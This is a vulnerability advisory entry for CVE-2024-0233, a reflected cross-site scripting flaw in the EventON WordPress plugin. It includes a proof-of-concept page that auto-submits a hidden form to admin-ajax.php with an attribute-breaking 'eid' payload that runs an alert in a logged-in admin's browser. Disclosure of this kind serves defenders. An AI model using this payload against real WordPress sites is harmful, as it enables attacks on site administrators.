Lucene search
Erwan LR (WPScan)WPEX-ID:04A708A0-B6F3-47D1-AAC9-0BB17F57C61EHistoryJan 10, 2024 - 12:00 a.m.
EventON (Free < 2.2.8, Premium < 4.5.5) - Reflected XSS
2024-01-1000:00:00
Erwan LR (WPScan)
33
eventon
reflected xss
vulnerability
version 2.2.8
version 4.5.5
free
premium
admin-ajax.php
exploit
security
0.0005 Low
EPSS
Percentile
17.0%
Description The plugins do not properly sanitise and escape a parameter before outputting it back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open a page with the code below
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="eventon_select_virtual_moderator" />
<input type="hidden" name="eid" value="'autofocus onfocus=alert`XSS` a=b" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
cvelist
cvelist
CVE-2024-0233 EventON (Free < 2.2.8, Premium < 4.5.5) - Reflected XSS
2024-01-16 15:57:02
cve
cve
CVE-2024-0233
2024-01-16 16:15:14
nvd
nvd
CVE-2024-0233
2024-01-16 16:15:14
wpvulndb
wpvulndb
EventON (Free < 2.2.8, Premium < 4.5.5) - Reflected XSS
2024-01-10 00:00:00
prion
prion
Cross site scripting
2024-01-16 16:15:00